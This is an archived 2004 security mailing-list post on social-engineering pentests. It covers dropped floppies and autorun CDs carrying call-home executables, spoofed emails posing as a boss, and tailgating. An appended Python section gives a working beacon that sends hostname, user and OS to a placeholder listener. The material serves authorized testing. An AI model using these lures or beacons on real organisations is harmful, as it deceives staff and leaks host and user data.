Re: physical security pentesting and social engineering

From: Gadi Evron (ge@linuxbox.org)
Date: Sat Dec 04 2004 - 07:35:58 EST


I originally planned to email it for the social engineering thread, but
our moderator closed it.

-----

Bones wrote:

> I am sure this has been asked here several times before, but if
> everyone could indulge me I would be grateful.
>
> I am trying to find some good resources for social engineering
> methodologies and such performed as part of pen-test work.
>
> Books, links, previous SF posts (date/subject) etc. are all welcome.

Hi. I've seen many people on this thread providing you with reading
material and some suggestions on where to learn more - I've learned a
lot from it myself.

I will try to give you five simple and practical examples. You can take
it from there:
1. Drop a floppy near the closest vending machine or in-building
    dining-room. Put a call-home executable on it with a shiny icon and
    name.
2. Drop a CD saying "fourth quarter layoffs" in the elevator, put an
    auto-run with your call-home bit.
3. Give away some PC mags at the entrance or across the street, and put
    your CD in.
4. Drop a wireless router in the middle of the building (plan according
    to corporate culture. Someone might actually pick it up, or ignore
    it). You can even write on the button asking people to call security
    (then try that again with a promise of a reward). Consider putting it
    in a rack.
5. Try gathering a tiny bit of info about workers and friends, then send
    a (possibly spoofed) email, with a small surprise inside. You can be
    a boss going abroad and asking for info to be sent to a Hotmail
    box... or just a friend of a friend (or the friend themselves) sending
    a cool Flash program.

Other than that, I'd also try to trick my way into places... running after
doors, asking people to keep them open for me, or to hold on to
something... maybe even talk my way into the building/premises itself.
But that would take research (or being small).

Ever tried waving a $20 bill as if it were a credential and going in? :)

If you plan anything big, make sure you go big. Get actors and do your
research. For a simple pen-test it won't be required - but that is only
my bet.

There is no such thing as a non-successful pen-test. If there is, you
lose, and not just financially. The ego involved with this is not to be
underestimated - "we passed the pen-test!". That is why I believe in
social engineering for penetration testing.

I hope this helps!

:)

     Gadi Evron.
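The "call-home bit" in examples 1-3 above is the part that turns a dropped floppy or CD into a measurable result: you need to know which lure was opened, on which host, and you need to be sure the records are really from your media. The following is an added example written for this archive page, not code from Gadi's post or from any tool he names. It is the kind of minimal beacon a tester would put on authorized dropped media, together with the listener-side parsing and a per-lure tally. The listener URL, the shared key and the drop tags are hypothetical values chosen for illustration; the beacon deliberately collects only enough to prove execution (tag, hostname, user, OS, time) and nothing that would need handling as client data afterwards.

```python
"""Call-home beacon for dropped media in an authorized physical pentest,
plus the listener-side verification and a tally per lure.

Added example for this archive page, not the original poster's code.
Every constant below is a hypothetical per-engagement value.
"""
import getpass
import hashlib
import hmac
import json
import platform
import socket
import time
import urllib.request

# Hypothetical: the listener the beacon posts to, and a key rotated per job.
LISTENER_URL = "http://callhome.example.invalid/beacon"
SHARED_KEY = b"rotate-this-key-per-engagement"

# Hypothetical: one tag per drop, so the tally shows which lure was opened.
DROP_TAGS = {
    "vending-machine-floppy": "drop-01",
    "elevator-layoffs-cd": "drop-02",
    "free-magazine-cd": "drop-03",
}


def build_beacon(drop_tag, now=None):
    """Collect only what proves execution on a host: tag, host, user, OS,
    time.  No file contents, no credentials: the report only has to say
    'someone ran the payload from drop X on host Y'."""
    if drop_tag not in DROP_TAGS.values():
        raise ValueError("unknown drop tag %r" % drop_tag)
    try:
        user = getpass.getuser()
    except Exception:  # no usable account lookup on this host
        user = "unknown"
    return {
        "tag": drop_tag,
        "host": socket.gethostname(),
        "user": user,
        "os": platform.platform(),
        "ts": int(now if now is not None else time.time()),
    }


def sign(body, key=SHARED_KEY):
    """HMAC over the JSON body, so the listener can drop records that did
    not come from our media (a finder replaying the URL, or a defender
    feeding it junk to pollute the tally)."""
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def encode_beacon(beacon, key=SHARED_KEY):
    body = json.dumps(beacon, sort_keys=True).encode("utf-8")
    return body, sign(body, key)


def send_beacon(drop_tag, url=LISTENER_URL, timeout=5):
    """Media side.  Silent on failure: an unreachable listener simply means
    this drop never shows up in the tally."""
    body, mac = encode_beacon(build_beacon(drop_tag))
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"Content-Type": "application/json", "X-Beacon-MAC": mac})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except OSError:
        return None


def parse_beacon(body, mac, key=SHARED_KEY):
    """Listener side: verify the MAC before trusting a single field."""
    if not hmac.compare_digest(sign(body, key), mac):
        raise ValueError("bad MAC: beacon not from our media")
    rec = json.loads(body.decode("utf-8"))
    for field in ("tag", "host", "user", "os", "ts"):
        if field not in rec:
            raise ValueError("missing field %r" % field)
    if rec["tag"] not in DROP_TAGS.values():
        raise ValueError("unknown drop tag %r" % rec["tag"])
    return rec


def tally(records):
    """Phone-homes per lure: the number the final report needs."""
    name_of = {tag: name for name, tag in DROP_TAGS.items()}
    counts = {name: 0 for name in DROP_TAGS}
    for rec in records:
        counts[name_of[rec["tag"]]] += 1
    return counts


if __name__ == "__main__":
    # Constructed sample: three beacons as the listener would receive them.
    inbox = [encode_beacon(build_beacon(tag, now=1700000000 + i))
             for i, tag in enumerate(("drop-02", "drop-02", "drop-01"))]
    accepted = [parse_beacon(body, mac) for body, mac in inbox]
    print(tally(accepted))
```

The MAC is there for scope and evidence, not secrecy: anything posted without a valid signature is not counted, so the tally in the report reflects only the client's staff running the tester's media. Keep the beacon to execution proof only; if the drop is meant to go further than "it was opened", that is a separate, explicitly scoped step.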



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:09 EDT